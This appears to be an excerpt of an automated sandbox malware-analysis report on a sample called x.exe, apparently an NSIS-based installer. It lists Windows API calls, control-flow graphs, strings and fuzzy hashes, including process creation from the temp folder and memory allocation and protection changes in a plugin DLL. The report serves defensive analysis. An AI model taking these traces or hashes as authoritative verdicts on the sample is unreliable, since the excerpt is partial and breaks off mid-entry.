                                                  • GetTempFileNameA.KERNELBASE(?,nsa,00000000,?), ref: 0040673F
                                                  Strings
                                                  • nsa, xrefs: 00406736, 0040673B
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406719
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406715
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                  • API String ID: 1716503409-3664342310

                                                  Control-flow Graph

                                                  control_flow_graph 906 4065a6-4065bc GetModuleHandleA 907 4065c8-4065d0 GetProcAddress 906->907 908 4065be-4065bf call 405f0b 906->908 910 4065d6-4065d8 907->910 911 4065c4-4065c6 908->911 911->907 911->910
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403612,0000000C), ref: 004065B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004065D0
                                                    • Part of subcall function 00405F0B: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F22
                                                    • Part of subcall function 00405F0B: wsprintfA.USER32 ref: 00405F5A
                                                    • Part of subcall function 00405F0B: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                  • API String ID: 2547128583-890815371

                                                  Control-flow Graph

                                                  control_flow_graph 912 406637-40666a call 40600b 915 4066a7 912->915 916 40666c-406699 RegQueryValueExA RegCloseKey 912->916 917 4066aa-4066ac 915->917 916->915 918 40669b-40669f 916->918 918->917 919 4066a1-4066a5 918->919 919->915 919->917
                                                  APIs
                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,?,00000400,?,00000400,0079F640,?,00000000,Call,?,?,00000002,00405D1D), ref: 0040667E
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00406689
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864

                                                  Control-flow Graph

                                                  control_flow_graph 920 40637b-4063ac CreateProcessA 921 4063ba-4063bb 920->921 922 4063ae-4063b7 CloseHandle 920->922 922->921
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,007A4400,00000000,00000000,00000000,04000000,00000000,00000000,0079FE40,?,?,?,007A4400,?), ref: 004063A4
                                                  • CloseHandle.KERNEL32(?,?,?,007A4400,?), ref: 004063B1
                                                  Strings
                                                  • "C:\Users\user\AppData\Local\Temp\x.exe" , xrefs: 0040637B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: "C:\Users\user\AppData\Local\Temp\x.exe"
                                                  • API String ID: 3712363035-3765332578

                                                  Control-flow Graph

                                                  control_flow_graph 923 405b8d-405b9d CreateDirectoryA 924 405ba7-405baa 923->924 925 405b9f-405ba5 GetLastError 923->925 925->924
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403ABC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00405B95
                                                  • GetLastError.KERNEL32 ref: 00405B9F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1375471231-3355392842

                                                  Control-flow Graph

                                                  control_flow_graph 926 73ad1606-73ad1643 call 73ad2288 930 73ad176f-73ad1773 926->930 931 73ad1649-73ad164d 926->931 932 73ad164f-73ad1655 call 73ad1edd 931->932 933 73ad1656-73ad1661 call 73ad1f58 931->933 932->933 938 73ad1699-73ad16a0 933->938 939 73ad1663-73ad1669 933->939 940 73ad16c0-73ad16c4 938->940 941 73ad16a2-73ad16be call 73ad2128 call 73ad15f4 call 73ad157e GlobalFree 938->941 942 73ad166b-73ad166e 939->942 943 73ad168a-73ad168e 939->943 944 73ad16c6-73ad170f call 73ad1e71 call 73ad2128 940->944 945 73ad1711-73ad1717 call 73ad2128 940->945 966 73ad1718-73ad171c 941->966 948 73ad167a-73ad167b call 73ad2bc4 942->948 949 73ad1670-73ad1673 942->949 943->938 946 73ad1690-73ad1691 call 73ad2e4f 943->946 944->966 945->966 960 73ad1696 946->960 957 73ad1680 948->957 955 73ad1675-73ad1678 949->955 956 73ad1682-73ad1688 call 73ad1774 949->956 955->938 955->948 965 73ad1698 956->965 957->960 960->965 965->938 970 73ad175f-73ad1766 966->970 971 73ad171e-73ad1730 call 73ad1f1f 966->971 970->930 973 73ad1768-73ad1769 GlobalFree 970->973 976 73ad174f-73ad1751 971->976 977 73ad1732-73ad1736 971->977 973->930 976->970 979 73ad1753-73ad175e call 73ad1558 976->979 977->976 978 73ad1738-73ad1740 977->978 978->976 980 73ad1742-73ad1749 FreeLibrary 978->980 979->970 980->976
                                                  APIs
                                                    • Part of subcall function 73AD2288: GlobalFree.KERNEL32(?), ref: 73AD2901
                                                    • Part of subcall function 73AD2288: GlobalFree.KERNEL32(?), ref: 73AD2907
                                                    • Part of subcall function 73AD2288: GlobalFree.KERNEL32(?), ref: 73AD290D
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD16B8
                                                  • FreeLibrary.KERNEL32(?), ref: 73AD1743
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD1769
                                                    • Part of subcall function 73AD1EDD: GlobalAlloc.KERNEL32(00000040,?), ref: 73AD1F0C
                                                    • Part of subcall function 73AD1774: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,73AD1688,00000000), ref: 73AD1817
                                                    • Part of subcall function 73AD1E71: wsprintfA.USER32 ref: 73AD1EA4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-0

                                                  Control-flow Graph

                                                  • [Graph figure not recoverable as text; legend: Executed / Not Executed]
                                                  APIs
                                                    • Part of subcall function 004067CB: lstrcpynA.KERNEL32(?,?,00000400,00403673,Yangtze Setup,NSIS Error), ref: 004067D8
                                                    • Part of subcall function 00406876: CharNextA.USER32(?,?,?,007A0288,004062F9,007A0288,007A0288,00000000,?,?,004063E0,?,00000000,76763410,?), ref: 00406884
                                                    • Part of subcall function 00406876: CharNextA.USER32(00000000), ref: 00406889
                                                    • Part of subcall function 00406876: CharNextA.USER32(00000000), ref: 0040689D
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A15
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,?,?,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A22
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A27
                                                    • Part of subcall function 004069AE: CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A3E
                                                  • lstrlenA.KERNEL32(007A0288,00000000,007A0288,007A0288,00000000,?,?,004063E0,?,00000000,76763410,?), ref: 00406331
                                                  • GetFileAttributesA.KERNELBASE(007A0288,007A0288), ref: 00406342
                                                    • Part of subcall function 0040627E: FindFirstFileA.KERNELBASE(00000000,007A1288,00000000,00406321,007A0288), ref: 00406289
                                                    • Part of subcall function 0040627E: FindClose.KERNEL32(00000000), ref: 00406295
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                  • String ID:
                                                  • API String ID: 1879705256-0
                                                  • Opcode ID: 30b8f8359afb46c6e9ecef805bc41305e31ce6143b0c2c7ea5ef27afe7aba0a9
                                                  • Instruction ID: 23df20a40deb082083f444ef96d4f38a3a39f11c55e39e2b3b79373d85619f1b
                                                  • Opcode Fuzzy Hash: 30b8f8359afb46c6e9ecef805bc41305e31ce6143b0c2c7ea5ef27afe7aba0a9
                                                  • Instruction Fuzzy Hash: 52F0F6620003105AC72137390D89A2B1A8D5E0275870F5A7FFC93B22E3D63CCC3695ED
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00403204,C:\Users\user\AppData\Local\Temp\x.exe,80000000,00000003,?,?,?,?,?), ref: 004065DF
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 004065FF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 4ebd5535ffd0a4e41f5352dc030421f8bb865cc25a132c6cf26c601cc10009b4
                                                  • Instruction ID: d03ab6a5e47df52ccf3a1c7873ec34ccd0f93c855a8f03577e23eb658a8f1623
                                                  • Opcode Fuzzy Hash: 4ebd5535ffd0a4e41f5352dc030421f8bb865cc25a132c6cf26c601cc10009b4
                                                  • Instruction Fuzzy Hash: 54D09E71158201AEDF054F20DE4AF1FBA65EF84710F114A2CF5A2D40F0DA718855AA11
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?), ref: 73AD2C83
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: de865a2bfd0d763dba057852f049ad2a8686fe725f3e8ac3009eb82fcd2184ba
                                                  • Instruction ID: 5d2c9c6c0d72f61301100180e0df06467e0e9c62709bb0ce407b943f611e2fa0
                                                  • Opcode Fuzzy Hash: de865a2bfd0d763dba057852f049ad2a8686fe725f3e8ac3009eb82fcd2184ba
                                                  • Instruction Fuzzy Hash: 154170B29203089FEF10AF75EA87B4937B5EB08254F30452BE5098A2ACD735D562CB90
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00791E00,00403123,?,00791E00,?,00791E00,?,?), ref: 004066DE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: ca216c0d528c4680506d2ea24c70e12b03f25ea9cafb0f7f106dcfbd7b4d0bc1
                                                  • Instruction ID: ca43ab2021c48c6ed20ae07fed446d3e058249cf91169c4d6ccd6ea6d786ecf5
                                                  • Opcode Fuzzy Hash: ca216c0d528c4680506d2ea24c70e12b03f25ea9cafb0f7f106dcfbd7b4d0bc1
                                                  • Instruction Fuzzy Hash: 06E04F32200018BB8F204F46CC04D9FFF6CEE956A07014026F905E2110D672EA21C6E4
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00402FA5,?,00000004,00000000,00000000,00000000,00000000), ref: 0040661F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: bd304702ca55fb74df8d559d79e235c3fa1ae846be4974c670cc6582d5ef9c9a
                                                  • Instruction ID: 05bac8184c74b89d57db3688415717db9778dff1ee84c3d008638f7d30794d88
                                                  • Opcode Fuzzy Hash: bd304702ca55fb74df8d559d79e235c3fa1ae846be4974c670cc6582d5ef9c9a
                                                  • Instruction Fuzzy Hash: E1E04632600029BB8F208F9ADC08D9FBFBCEF916A0B024026B805E2110D671EA11CAE4
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(73AD501C,00000004,00000040,73AD5034), ref: 73AD19E5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: aa1202b3d2a83a44fe4a36d8322e2011657a4e77144636b43c1a435941a7e7c2
                                                  • Instruction ID: fbc364a7f38c81b66dc28f8e6f63e72a7f9a21bb7a46c28f85666d2bbda2c306
                                                  • Opcode Fuzzy Hash: aa1202b3d2a83a44fe4a36d8322e2011657a4e77144636b43c1a435941a7e7c2
                                                  • Instruction Fuzzy Hash: 04F098F2939340DEDB18AF2AB546B093AA0F719345B20852EF65DDA34DC33041229F9A
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,0079F640,00000000,00000000,?,00000400,00000000,?,00406665,00000400,0079F640,?,00000000,Call,?,?), ref: 0040602F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: f93216e26e4b5cbc88d93a17ab61893ce428fb9cf933fa418bea21b24ba7b136
                                                  • Instruction ID: ebd9b90c314e4c6716f0288355afd2849620ca31031a4bc7455833a411c7a122
                                                  • Opcode Fuzzy Hash: f93216e26e4b5cbc88d93a17ab61893ce428fb9cf933fa418bea21b24ba7b136
                                                  • Instruction Fuzzy Hash: 65D0123204020EBFDF119F90ED05FAB3B1DEB08350F004826FE06A40A1D775D530AB64
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004033AC,00048BE4,?,?,?,?,?), ref: 00402F4E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 6840ce3c9e1d8f502c1c59a726beee96ff429b96c3a756e0cc7e880b863284f8
                                                  • Instruction ID: 6676b4682d1b1505b733c47c67c1370fa0461ed9fa78b3ce244d4aa898b8dae2
                                                  • Opcode Fuzzy Hash: 6840ce3c9e1d8f502c1c59a726beee96ff429b96c3a756e0cc7e880b863284f8
                                                  • Instruction Fuzzy Hash: A3B09231540200AADA214F009E0AF057A21BB94700F208824B2A0280F086711060EA0D
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404D83
                                                  • ShowWindow.USER32(?), ref: 00404DAD
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404DBE
                                                  • ShowWindow.USER32(?,00000004), ref: 00404DDA
                                                  • GetDlgItem.USER32(?,00000001), ref: 00404F01
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404F0B
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00404F25
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404F73
                                                  • GetDlgItem.USER32(?,00000003), ref: 00405022
                                                  • ShowWindow.USER32(00000000,?), ref: 0040504B
                                                  • EnableWindow.USER32(?,?), ref: 0040505F
                                                  • EnableWindow.USER32(?), ref: 00405073
                                                  • EnableWindow.USER32(?), ref: 0040508B
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004050A2
                                                  • EnableMenuItem.USER32(00000000), ref: 004050A9
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004050BA
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004050D1
                                                  • lstrlenA.KERNEL32(0079DE10,?,0079DE10,00000000), ref: 00405102
                                                    • Part of subcall function 00405C08: lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405A98,0079F640,?,?,?,?), ref: 00405DE3
                                                  • SetWindowTextA.USER32(?,0079DE10), ref: 00405118
                                                    • Part of subcall function 00401399: MulDiv.KERNEL32(00000000,00007530,00000000), ref: 004013F9
                                                    • Part of subcall function 00401399: SendMessageA.USER32(?,00000402,00000000), ref: 00401409
                                                  • DestroyWindow.USER32(?,00000000), ref: 00405160
                                                  • CreateDialogParamA.USER32(?,?,FF85D79F), ref: 00405194
                                                    • Part of subcall function 004052CA: SetDlgItemTextA.USER32(?,?,00000000), ref: 004052E4
                                                  • GetDlgItem.USER32(?,000003FA), ref: 004051BD
                                                  • GetWindowRect.USER32(00000000), ref: 004051C4
                                                  • ScreenToClient.USER32(?,?), ref: 004051D0
                                                  • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 004051E9
                                                  • ShowWindow.USER32(00000008,?,00000000), ref: 00405208
                                                    • Part of subcall function 00405298: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004052AA
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040524E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$Enable$LongMenuText$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 3304020681-0
                                                  • Opcode ID: 9e89432b1bdca832879b970f2ef1913fa5e31831880cef7cabffaa785620b88a
                                                  • Instruction ID: daf878dbb0fe506a95ac5aa8a7a8fd29926fe041031fb44bae1ffc41b04d5d8a
                                                  • Opcode Fuzzy Hash: 9e89432b1bdca832879b970f2ef1913fa5e31831880cef7cabffaa785620b88a
                                                  • Instruction Fuzzy Hash: CFD1D3B1504614EBDB20AF25ED4491B7BA8FB89354F00453EF645B22E1CB3C9852DFAD
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,76758A60,?,00405FC7,?,?), ref: 0040606A
                                                  • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 00406073
                                                  • GetShortPathNameA.KERNEL32(?,007A0A88,00000400), ref: 00406090
                                                  • wsprintfA.USER32 ref: 004060AE
                                                  • GetFileSize.KERNEL32(00000000,00000000,007A0A88,C0000000,00000004,007A0A88,?), ref: 004060E6
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004060F6
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406126
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A0688,00000000,-0000000A,00408704,00000000,[Rename],00000000,00000000,00000000), ref: 00406146
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406158
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040615F
                                                    • Part of subcall function 004065DB: GetFileAttributesA.KERNELBASE(00000003,00403204,C:\Users\user\AppData\Local\Temp\x.exe,80000000,00000003,?,?,?,?,?), ref: 004065DF
                                                    • Part of subcall function 004065DB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 004065FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2900126502-1727408572
                                                  • Opcode ID: 0b08d87e99941488f3443e01b1849f7776e59dc873762c427908d9fc1b1211e2
                                                  • Instruction ID: 881d5a06b33b51acfdd56e94407a7bb8708709a660f4e77e233cfe3e0cd730f2
                                                  • Opcode Fuzzy Hash: 0b08d87e99941488f3443e01b1849f7776e59dc873762c427908d9fc1b1211e2
                                                  • Instruction Fuzzy Hash: 5A3114B02006117BD62027358E49E6B365DDF81719F16083EF903BA2C3EE3DD82686BC
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A15
                                                  • CharNextA.USER32(?,?,?,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A22
                                                  • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A27
                                                  • CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A3E
                                                  Strings
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004069B6
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004069B1
                                                  • *?|<>/":, xrefs: 00406A05
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                  • API String ID: 589700163-2188270913
                                                  • Opcode ID: 1fa643219522464caf3af4bb2876b6f7dd3ce8fd2f1d6c4a65fd6b92b46d134d
                                                  • Instruction ID: 07eff5cc72d9999094b905a7836252b4e7207ab828467c82055de66064a8a9fe
                                                  • Opcode Fuzzy Hash: 1fa643219522464caf3af4bb2876b6f7dd3ce8fd2f1d6c4a65fd6b92b46d134d
                                                  • Instruction Fuzzy Hash: 9A110461A893D55AE731AA385C0076BBF984F67390F1A407FE4C233382E6394C1583AA
                                                  APIs
                                                    • Part of subcall function 73AD12C6: GlobalAlloc.KERNEL32(00000040,73AD11C4,-000000A0), ref: 73AD12CE
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD2228
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD225D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 396c2b63d09b6f27c50ed9aa8d1723e770c4964095cf08ce92d2fd4c28889a95
                                                  • Instruction ID: fb69f0a4c042a9be79ae875b814321a16da4b495b7a886405bd00bca949bf2fd
                                                  • Opcode Fuzzy Hash: 396c2b63d09b6f27c50ed9aa8d1723e770c4964095cf08ce92d2fd4c28889a95
                                                  • Instruction Fuzzy Hash: 28412432124108EFE71A9F65DD4BF2A7BB9FB49300F10416EF90A9619CDB35A852CB61
                                                  APIs
                                                  • lstrlenA.KERNEL32(0079F640,00000000,?,?,?), ref: 00405A9A
                                                  • lstrlenA.KERNEL32(?,0079F640,00000000,?,?,?), ref: 00405AAA
                                                  • lstrcatA.KERNEL32(0079F640,?,?,0079F640,00000000,?,?,?), ref: 00405AC3
                                                  • SetWindowTextA.USER32(0079F640,0079F640), ref: 00405ADE
                                                  • SendMessageA.USER32 ref: 00405B08
                                                  • SendMessageA.USER32(00000000,00001007,00000000,0079F640), ref: 00405B25
                                                  • SendMessageA.USER32(00000000,00001013,00000000,00000000), ref: 00405B33
                                                    • Part of subcall function 00405C08: lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405A98,0079F640,?,?,?,?), ref: 00405DE3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                  • String ID:
                                                  • API String ID: 1759915248-0
                                                  • Opcode ID: 860b860570a6bdf1dee3105dde6e314c32e3ea8240ebd3ea09cd58385db8663d
                                                  • Instruction ID: f85030e8b0c56f537beadb89fa8a9f76d5cc5969031f723e6c5fe352ed96c1e7
                                                  • Opcode Fuzzy Hash: 860b860570a6bdf1dee3105dde6e314c32e3ea8240ebd3ea09cd58385db8663d
                                                  • Instruction Fuzzy Hash: 8A210872A047156BD710EF158C40F6BBBE8EB95720F04043EFA85B7291C67CE8098FA9
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040343F
                                                  • MulDiv.KERNEL32(000B8D10,00000064,000B8D10), ref: 00403467
                                                  • wsprintfA.USER32 ref: 00403477
                                                  • SetWindowTextA.USER32(?,?), ref: 00403487
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00403499
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00403471
                                                  Memory Dump Source
